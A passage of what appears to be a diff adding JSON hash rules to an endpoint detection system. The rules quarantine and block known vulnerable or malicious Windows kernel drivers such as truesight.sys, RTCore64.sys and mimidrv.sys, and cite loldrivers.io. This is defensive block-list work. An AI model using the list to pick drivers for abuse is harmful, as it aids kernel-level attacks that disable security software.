null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "49ed27460730b62403c1d2e4930573121ab0c86c442854bc0a62415ca445a810", + "comment": "Vulnerable Kernel Driver (aka ProxyDrv.sys) [https://www.loldrivers.io/drivers/0e3b0052-18c7-4c8b-a064-a1332df07af2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25c64d50-8972-5d79-af17-8be0d7a5a82b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476724Z", + "creation_date": "2026-03-23T11:45:31.476728Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476738Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14e49bc3781d1bd4a629c49d289f0753eeff1620183aff6878921d98411838d4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25cd612d-e075-5ec4-802c-1d75ff73c1b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", 
+ "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460608Z", + "creation_date": "2026-03-23T11:45:30.460611Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460620Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d21aba58222930cb75946a0fb72b4adc96de583d3f7d8dc13829b804eb877257", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25cfdfe6-3621-58f8-b005-dc9da8087dc8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834845Z", + "creation_date": "2026-03-23T11:45:30.834848Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834858Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "86ec1a34c5fc59f060905bd400a7b93f17ce035801aeff68084c362303cd8d63", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25d47af5-c410-5763-b3e0-f4315cb3c8f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617765Z", + "creation_date": "2026-03-23T11:45:29.617767Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617772Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5bdba1561ec5b23b1d56ea8cee411147d1526595f03a9281166a563b3641fa2a", + "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25d8d234-ce5b-5ee6-9b0b-4da5e892db71", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475634Z", + "creation_date": "2026-03-23T11:45:31.475638Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475648Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "987c0ae95c1a5af412dbf07f30fadc81c09e762ae030be0d40d178bcdae27869", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25e75c18-8861-5a2e-9267-07eaeb6b340f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463098Z", + "creation_date": "2026-03-23T11:45:30.463101Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463110Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7b846b0a717665e4d9fb313f25d1f6a5b782e495387aea45cf87ad3c049ac0db", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25f9a628-61a7-5e33-8f9c-93ed5fec5a41", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836667Z", + "creation_date": "2026-03-23T11:45:30.836669Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836688Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5503457b83080d56dec2577ea173015d4f947154898d7af3e3f3440d75497cd3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25fb542c-0d83-5bac-b4c2-98003264ba4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472885Z", + "creation_date": "2026-03-23T11:45:30.472888Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472898Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "79440da6b8178998bdda5ebde90491c124b1967d295db1449ec820a85dc246dd", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "25fce0b8-a31c-5b3f-8f93-3272b92ddc79", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459587Z", + "creation_date": "2026-03-23T11:45:30.459598Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459607Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8168304169a2453c0c3e0a285c2a07d3b3b83433e0342f6b33400c371af86221", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26011834-75fc-5513-81c8-5d7abe8b447f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807660Z", + "creation_date": "2026-03-23T11:45:31.807662Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807667Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be3d34831f9c5756b5c4914113e191435a35482b56af72b97de05b26fd396496", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "260c36bb-031e-5c99-a909-cad0dddd3638", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467181Z", + "creation_date": "2026-03-23T11:45:30.467184Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467193Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0820ae4ffc5258b49787423bd392cd29a6a77777b955dd210a41238b02f05c3e", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2624c951-7316-5756-814b-cedf761e77d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810200Z", + "creation_date": "2026-03-23T11:45:31.810202Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810208Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18cb010c716e03e8341ba43b4423695306d85b8723e7a89f5d8a73c6ddb25169", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26250b78-d22a-568c-baf5-ea8e937f41c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817914Z", + "creation_date": 
"2026-03-23T11:45:31.817918Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817927Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0eadb6eff81dd20553f7564b31147af7064dc8f5b7d71407ca24c4783cd0ffd4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "263de15c-e0c5-5972-91e0-8308e333822b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491244Z", + "creation_date": "2026-03-23T11:45:31.491247Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491256Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e7e358fee32f2437831f45baee3a8513c5f1e34b06d1b0442891600a338206bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "263f7a4c-decb-5e71-bc2d-be9aa6cfa2b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473842Z", + "creation_date": "2026-03-23T11:45:30.473846Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473854Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e307281c9f7329579988190e24a655b15bb2e60afc585109f05a79e5aba81a0", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2641b4da-7d0f-54aa-920f-25472d592ace", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828742Z", + "creation_date": "2026-03-23T11:45:31.828744Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.828749Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47b34c0c133155e7a36993a79f6f9d0edc174d64087385560f28b38f15e3b1f1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "264f52d1-382c-5b79-911e-187ae83ece5e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827820Z", + "creation_date": "2026-03-23T11:45:30.827822Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827828Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "619bebecbd811dc30558beb48a9bfe437c4807b5bc34543a6b6b4f1ebc564445", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26501787-413b-58d6-a82e-d1d9c84dde45", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978527Z", + "creation_date": "2026-03-23T11:45:29.978529Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978534Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05", + "comment": "Vulnerable Kernel Driver (aka AMDPowerProfiler.sys) [https://www.loldrivers.io/drivers/9a4fb66e-9084-4b21-9d76-a7afbe330606/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "265d45b5-1b73-5f18-967b-7c34b1ed731d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465765Z", + "creation_date": "2026-03-23T11:45:30.465768Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465777Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"793b78e70b3ae3bb400c5a8bc4d2d89183f1d7fc70954aed43df7287248b6875", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26822bab-ab21-5d71-afb2-98e01c88d1de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984140Z", + "creation_date": "2026-03-23T11:45:29.984142Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984147Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c", + "comment": "Vulnerable Kernel Driver (aka OpenLibSys.sys) [https://www.loldrivers.io/drivers/2e4fedb0-30ed-400d-b4e1-b2b2004c1607/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26884fc8-f8b5-536d-9e37-90a04d0a3081", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.483689Z", + "creation_date": "2026-03-23T11:45:31.483692Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483701Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89c1821b4546ae1d1fb4e84c9243691309d8191164573e978887c211b29471c0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2688ae05-ac5d-5091-ad82-87d0b4cf8163", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827122Z", + "creation_date": "2026-03-23T11:45:31.827124Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827129Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dac13ca91fa4f17531ce45e45bccec7002fdbe06e98024dcc381c776597e71f6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "268a1631-c5d7-546a-8b22-f8ba5bc4be4b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819708Z", + "creation_date": "2026-03-23T11:45:30.819710Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819716Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7c90cf3fdbbd2f40fe6a39ad0bb2a9a97a0416354ea84db3aeff6d925d14df8", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "268fa52c-572f-523f-8362-1f082a70d4a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142290Z", + "creation_date": "2026-03-23T11:45:31.142292Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142298Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc9a724d6d780f8ee8f7886d76af56c468d8f07ddaf73cbcdbe81c31a1dca48e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2696f880-975a-59b7-9a6c-49640b758c08", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476015Z", + "creation_date": 